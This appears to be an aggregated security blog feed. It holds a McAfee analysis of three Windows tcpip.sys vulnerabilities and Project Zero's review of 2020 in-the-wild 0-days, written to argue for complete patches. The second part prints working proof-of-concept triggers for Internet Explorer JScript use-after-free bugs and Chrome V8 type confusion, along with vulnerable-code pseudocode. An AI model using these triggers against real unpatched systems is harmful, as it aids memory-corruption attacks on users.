Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Researchers Follow the Breadcrumbs: The Latest Vulnerabilities in Windows’ Network Stack

9 February 2021 at 19:07
data breach
The concept of a trail of breadcrumbs in the offensive security community is nothing new; for many years, researchers on both sides of the ethical spectrum have followed the compass based on industry-wide security findings, often leading to groundbreaking discoveries in both legacy and modern codebases alike. This happened in countless instances, from Java to Flash to Internet Explorer and many more, often resulting in widespread findings and subsequent elimination or modification to large amounts of code. Over the last 12 months, we have noticed a similar trend in the analysis, discovery and disclosures of vulnerabilities in networking stacks. Starting with JSOF’s Ripple20, which we analyzed and released signatures for, a clear pattern emerged as researchers investigated anew the threat surfaces in the tcp/ip stacks deployed worldwide. Microsoft was no exception, of course running the Windows networking stack dating back to the earliest iterations of Windows, and frequently updated with new features and fixes.

In fact, looking back at just the last 8 months of Microsoft patches, we’ve tracked at least 25 significant vulnerabilities directly related to the Windows network stack. These have ranged from DNS to NTFS, SMB to NFS and recently, several tcp/ip bugs in fragmentation and packet reassembly for IPv4 and IPv6.

That brings us to this month’s patch Tuesday, which contains several more high-profile critical vulnerabilities in tcpip.sys. We’ll focus on three of these, including 2 marked as “remote code execution” bugs, which could lead to wormability if code execution is truly possible, and a persistent denial-of-service vulnerability which could cause a permanent Blue Screen of Death on the latest versions of Windows.

There are clear similarities between all 3, indicating both Microsoft and researchers external to Microsoft are highly interested in auditing this library, and are having success in weeding out a number of interesting bugs. The following is a short summary of each bug and the progress we have made to date in analyzing them.

What is CVE-2021-24086?
The first vulnerability analyzed in this set is a Denial-of-Service (DOS) attack. Generally, these types of bugs are rather uninteresting; however, a few can have enough of an impact that although an attacker can’t get code execution, they are well worth discussing. This is one of those few. One of the things that boost this vulnerability’s impact is the fact it is internet routable and many devices using IPv6 can be directly accessible over the internet, even when behind a router. It is also worth noting that the default Windows Defender Firewall configuration does not mitigate this attack. In a worst-case scenario, an attacker could spray this attack and put it on a continuous loop to potentially cause a “permanent” or persistent DOS to a wide range of systems.

This vulnerability exists when Windows’ tcpip.sys driver attempts to reassemble fragmented IPv6 packets. As a result, this attack requires many packets to be successful.  The root cause of this vulnerability is a NULL pointer dereference which occurs in Ipv6pReassembleDatagram. The crash occurs when reassembling a packet with around 0xffff bytes of extension headers.  It should be impossible to send a packet with that many bytes in the extension headers according to the RFC, however this is not considered in the Ipv6pReceiveFragments function when calculating the unfragmented length. Leveraging a proof-of-concept through the Microsoft MAPP program, McAfee was easily able to reproduce this bug, demonstrating it has the potential to be seen in the wild.

What is CVE-2021-24094?
This vulnerability is classified by Remote Code Execution (RCE), though our analysis thus far, code execution comes with unique challenges. Similar to CVE-2021-24086, this issue involves IPv6 packet reassembly by the Windows tcpip.sys driver. It is different from 24086 in that it doesn’t require a large packet with extension headers, and it is not a NULL pointer dereference. Instead, it is a dangling pointer which, if the right packet data is sprayed from an attacker over IPv6, will causes the pointer to be overwritten and reference an arbitrary memory location. When the data at the pointer’s target is accessed, it causes a page fault and thus a Blue Screen of Death (BSOD). Additionally, an attacker can create persistence of the DoS by continually pointing the attack at a victim machine.

While the reproduction of this issue causes crashes on the target in all reproductions so far, it’s unclear how easy it would be to force the pointer to a location that would cause valid execution without crashing. The pointer would need to point to a paged-in memory location that had already been written with additional data that could manipulate the IPv6 reassembly code, which would likely not come from this attack alone, but may require a separate attack to do so.

What is CVE-2021-24074?
CVE-2021-24074 is a potential RCE in tcpip.sys triggered during the reassembly of fragmented IPv4 packets in conjunction with a confusion of IPv4 IP Options. During reassembly, it is possible to have two fragments with different IP Options; this is against the IPv4 standard, but Windows will proceed further, while failing to perform proper sanity checks for the respective options. This type confusion can be leveraged to trigger an Out of Bounds (OOB) read and write by “smuggling” an IP option Loose source and record route (LSRR) with invalid parameters. This option is normally meant to specify the route a packet should take. It has a variable length, starts with a pointer field, and is followed by a list of IP addresses to route the packet through.

By leveraging the type confusion, we have an invalid pointer field that will point beyond the end of the routing list provided in the packet. When the routing function Ipv4pReceiveRoutingHeader looks up the next hop for the packet, it will OOB read this address (as a DWORD) and perform a handful of checks on it. If these checks are successful, the IP stack will attempt to route the packet to its next hop by copying the original packet and then writing its own IP address in the record route. Because this write relies on the same invalid pointer value as before, this turns out to be an OOB write (beyond the end of the newly allocated packet). The content of this OOB write is the IP address of the target machine represented as a DWORD (thus, not controlled by the attacker).

Microsoft rates this bug as “Exploitation more likely”, however exploitation might not be as straightforward as it sounds. For an attack to succeed, one would have to groom the kernel heap to place a certain value to be read during the OOB read, and then make it so the OOB write would corrupt something of interest. Likely, a better exploitation primitive would need to be established first in order to successfully exploit the bug. For instance, leveraging the OOB write to corrupt another data structure that could lead to information disclosure and/or a write-what-where scenario.

From a detection standpoint, the telltale signs of an active exploitation would be fragmented packets whose IP Options vary between fragments. For instance, the first fragment would not contain an LSRR option, while the second fragment would. This would likely be accompanied by a heavy traffic meant to shape the kernel heap.

Similarities and Impact Assessment
There are obvious similarities between all three of these vulnerabilities. Each is present in the tcpip.sys library, responsible for parsing IPv4 and IPv6 traffic. Furthermore, the bugs all deal with packet reassembly and the RCE vulnerabilities leverage similar functions for IPv4 and IPv6 respectively. Given a combination of public and Microsoft-internal attribution, it’s clear that researchers and vendor alike are chasing down the same types of bugs. Whenever we see vulnerabilities in network stacks or Internet-routed protocols, we’re especially interested to determine difficulty of exploitation, wormability, and impact. For vulnerabilities such as the RCEs above, a deep dive is essential to understand the likelihood of these types of flaws being built into exploit kits or used in targeted attacks and are prime candidates for threat actors to weaponize. Despite the real potential for harm, the criticality of these bugs is somewhat lessened by a higher bar to exploitation and the upcoming patches from Microsoft. We do expect to see additional vulnerabilities in the TCP/IP stack and will continue to provide similar analysis and guidance. As it is likely to take some time for threat actors to integrate these vulnerabilities in a meaningful way, the best course of action, as always, is widespread mitigation via patching.

The post Researchers Follow the Breadcrumbs: The Latest Vulnerabilities in Windows’ Network Stack appeared first on McAfee Blog.

Déjà vu-lnerability

By: Ryan
3 February 2021 at 17:10

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. For the 2nd year in a row, we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our root cause analyses.

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days. 

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.

Product

Vulnerability exploited in-the-wild

Variant of...

Microsoft Internet Explorer

CVE-2020-0674

CVE-2018-8653* CVE-2019-1367* CVE-2019-1429*

Mozilla Firefox

CVE-2020-6820

Mozilla Bug 1507180

Google Chrome

CVE-2020-6572

CVE-2019-5870

CVE-2019-13695

Microsoft Windows

CVE-2020-0986

CVE-2019-0880*

Google Chrome/Freetype

CVE-2020-15999

CVE-2014-9665

Apple Safari

CVE-2020-27930

CVE-2015-0093

* vulnerability was also exploited in-the-wild in previous years

 

Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability that’s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the 2019 year-in-review we devoted a section to these vulnerabilities. Google’s Threat Analysis Group attributed all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy Javascript engine in Internet Explorer. While it’s legacy, by default it is still enabled in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.

CVE-2018-8653

In December 2018, it was discovered that CVE-2018-8653 was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a write-up going through each step of this exploit.

var objs = new Array();

var refs = new Array();

var dummyObj = new Object();

function getFreeRef()

{

  // 5. delete prototype objects as well as ordinary objects

  for ( var i = 0; i < 10000; i++ ) {

    objs[i] = 1;

  }

  CollectGarbage();

  for ( var i = 0; i < 200; i++ )

  {

    refs[i].prototype = 1;

  }

  // 6. Garbage collector frees unused variable blocks.

  // This includes the one holding the "this" variable

  CollectGarbage();

  // 7. Boom

  alert(this);

}

// 1. create "special" objects for which isPrototypeOf can be invoked

for ( var i = 0; i < 200; i++ ) {

        var arr = new Array({ prototype: {} });

        var e = new Enumerator(arr);

        refs[i] = e.item();

}

// 2. create a bunch of ordinary objects

for ( var i = 0; i < 10000; i++ ) {

        objs[i] = new Object();

}

// 3. create objects to serve as prototypes and set up callbacks

for ( var i = 0; i < 200; i++ ) {

        refs[i].prototype = {};

        refs[i].prototype.isPrototypeOf = getFreeRef;

}

// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable

// During callback, the "this" variable won't be tracked by the Garbage collector

// use different index if this doesn't work

dummyObj instanceof refs[100];

CVE-2019-1367

In September 2019, CVE-2019-1367 was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JSCript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in the

    //    arguments array

    alert(arguments[0]);

}

// 1. Call sort with a custom callback

[1,2].sort(F);

CVE-2019-1429

The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied!

In November 2019, Microsoft released another patch to address this gap. CVE-2019-1429 addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. The variant is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JSCript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in the

    //    arguments array

    alert(arguments[0]);

}

+  // 1. Cause toJSON callback to fire

+  var o = {toJSON:F}

+  JSON.stringify(o);

-  // 1. Call sort with a custom callback

-  [1,2].sort(F);

CVE-2020-0674

In January 2020, CVE-2020-0674 was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

var spray = new Array();

+  function F(arg1, arg2) {

-  function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in one of the named arguments

    //    The named arguments aren't tracked by garbage collector

+    arg1 = spray[5000];

-    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JScript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in

    //   a named argument

+    alert(arg1);

-    alert(arguments[0]);

}

// 1. Call sort with a custom callback

[1,2].sort(F);

CVE-2020-0968

Unfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched CVE-2020-0968, another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the advisory).

var spray = new Array();

function f1() {

  alert('callback 1');

  return spray[6000];

}

function f2() {

  alert('callback 2');

  spray = null;

  CollectGarbage();

  return 'a'

}

function boom() {

  var e = o1;

  var d = o2;

  // 3. the first callback (e.toString) happens

  //    it returns one of the string variables

  //    which is stored in a temporary variable

  //    on the stack, not tracked by garbage collector

  // 4. Second callback (d.toString) happens

  //    There, string variables get freed

  //    and the space reclaimed

  // 5. Crash happens when attempting to access

  //    string content of the temporary variable

  var b = e + d;

  alert(b);

}

// 1. create two objects with toString callbacks

var o1 = { toString: f1 };

var o2 = { toString: f2 };

// 2. create a bunch of string variables

for (var a = 0; a < 20000; a++) {

  spray[a] = "aaa";

}

boom();

In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

Firefox CVE-2020-6820

Mozilla patched CVE-2020-6820 in Firefox with an out-of-band security update in April 2020. It is a use-after-free in the Cache subsystem.

CVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.

The execution patch for CVE-2020-6820 is:

StreamList::CloseAll  Patched function

  CacheStreamControlParent::CloseAll

    CacheStreamControlParent::NotifyCloseAll

      StreamControl::CloseAllReadStreams

        For each stream: 

          ReadStream::Inner::CloseStream

            ReadStream::Inner::Close

              ReadStream::Inner::NoteClosed

               

                StreamControl::NoteClosed

                  StreamControl::ForgetReadStream              

                    CacheStreamControlParent/Child::NoteClosedAfterForget

                      CacheStreamControlParent::RecvNoteClosed

                        StreamList::NoteClosed

                          If StreamList is empty && mStreamControl:

                           CacheStreamControlParent::Shutdown

                             Send__delete(this)  FREED HERE!

    PCacheStreamControlParent::SendCloseAll  Used here in call to Id()

CVE-2020-6820 is a variant of an internally found Mozilla vulnerability, Bug 1507180. 1507180 was discovered in November 2018 and patched in December 2019. 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, an explanatory comment for why the December 2019 patch was needed was added in early March 2020.

For 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls “higher” in StreamList::CloseAll. 

In my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [1, 2]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn’t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our in-the-wild tracking spreadsheet and thus included in this list.

Chrome for Android CVE-2020-6572

CVE-2020-6572 is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated.  

More specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder).

This vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle reported a very similar vulnerability, CVE-2019-13695. CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it’s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.

In addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The vulnerability is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is CVE-2019-5870. Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, “TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices”.

While one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This was noted in the issue tracker for CVE-2019-5870 and then brought up again after Man Yue Mo reported CVE-2019-13695.

Windows splwow64 CVE-2020-0986

CVE-2020-0986 is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and CVE-2019-0880, which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D.

From this great write-up from ByteRaptors on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:

void GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)

{

  ...

    if(*((BYTE*)(firstAddress + 0x4)) == 0x75){

      ULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));

      if(memcpyDestinationAddress != NULL){

        ULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));

        DWORD copySize = *((DWORD*)(firstAddress + 0x28));

        memcpy(memcpyDestinationAddress,sourceAddress,copySize);

      }

    }

...

}

The equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.

void GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)

{

  ...

    if(*((BYTE*)(msgSend + 0x4)) == 0x6D){

     ...

     ULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA)); 

     if(srcAddress != NULL){

        DWORD copySize = *((DWORD*)(msgSend + 0x40));

           if(copySize <= 0x1FFFE) {

                ULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));

                memcpy(destAddress,sourceAddress,copySize);

      }

    }

...

}

In addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the “Exploited 0-days not properly fixed” section below.

Freetype CVE-2020-15999

In October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, CVE-2020-15999. The vulnerability is a heap buffer overflow in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.

In November 2014, Project Zero team member Mateusz Jurczyk reported CVE-2014-9665 to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small.

To patch CVE-2014-9665, Freetype added a check to the rows and width prior to calculating the size as shown below.

if ( populate_map_and_metrics )

    {

      FT_Long  size;

      metrics->width  = (FT_Int)imgWidth;

      metrics->height = (FT_Int)imgHeight;

      map->width      = metrics->width;

      map->rows       = metrics->height;

      map->pixel_mode = FT_PIXEL_MODE_BGRA;

      map->pitch      = map->width * 4;

      map->num_grays  = 256;

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

      size = map->rows * map->pitch; <- overflow size

      error = ft_glyphslot_alloc_bitmap( slot, size );

      if ( error )

        goto DestroyExit;

    }

To patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG.

     if ( populate_map_and_metrics )

     {

+      /* reject too large bitmaps similarly to the rasterizer */

+      if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )

+      {

+        error = FT_THROW( Array_Too_Large );

+        goto DestroyExit;

+      }

+

       metrics->width  = (FT_UShort)imgWidth;

       metrics->height = (FT_UShort)imgHeight;

       map->width      = metrics->width;

       map->rows       = metrics->height;

       map->pixel_mode = FT_PIXEL_MODE_BGRA;

       map->pitch      = map->width * 4;

       map->num_grays  = 256;

-      /* reject too large bitmaps similarly to the rasterizer */

-      if ( map->rows > 0x7FFF || map->width > 0x7FFF )

-      {

-        error = FT_THROW( Array_Too_Large );

-        goto DestroyExit;

-      }

[...]

To summarize:

  • CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.
  • CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow.

Apple Safari CVE-2020-27930

This vulnerability is slightly different than the rest in that while it’s still a variant, it’s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The variant, CVE-2015-0993, was reported to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

CVE-2020-27930, the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write.

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

Product

Vulnerability that was exploited in-the-wild

2nd patch

Internet Explorer

CVE-2020-0674

CVE-2020-0968

Google Chrome

CVE-2019-13764*

CVE-2020-6383

Microsoft Windows

CVE-2020-0986

CVE-2020-17008/CVE-2021-1648

* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn’t comprehensively fix all of the variants. Microsoft patched CVE-2020-0968 in April 2020. We show the trigger in the section above.

Google Chrome CVE-2019-13674

CVE-2019-13674 in Chrome is an interesting case. When it was patched in November 2019, it was not known to be exploited in-the-wild. Instead, it was reported by security researchers Soyeon Park and Wen Xu. Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “Chrome Infinity Bug”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8’s integer type is that it is not closed under addition meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out this blog post if you’re interested!

for (var i = -Infinity; i < 0; i += Infinity) { }

The patch that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

var increment = -Infinity;

var k = 0;

// The initial loop value is 0 and the increment is -Infinity.

// This is permissible because 0 + -Infinity = -Infinity, an integer.

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    // Once the initial variable equals -Infinity (one loop through)

   // the increment is changed to +Infinity. -Infinity + +Infinity = NaN

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. This incomplete fix was reported to Chrome in February 2020. This patch was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”. Again, check out Sergei’s blog post if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry knows there is a detection gap in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days and we certainly don’t find them all in a timely manner.

Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After Kaspersky reported that CVE-2020-0986 was actively exploited as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only disclosed as exploited in-the-wild in August 2020.

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. This issue was reported to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.

Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

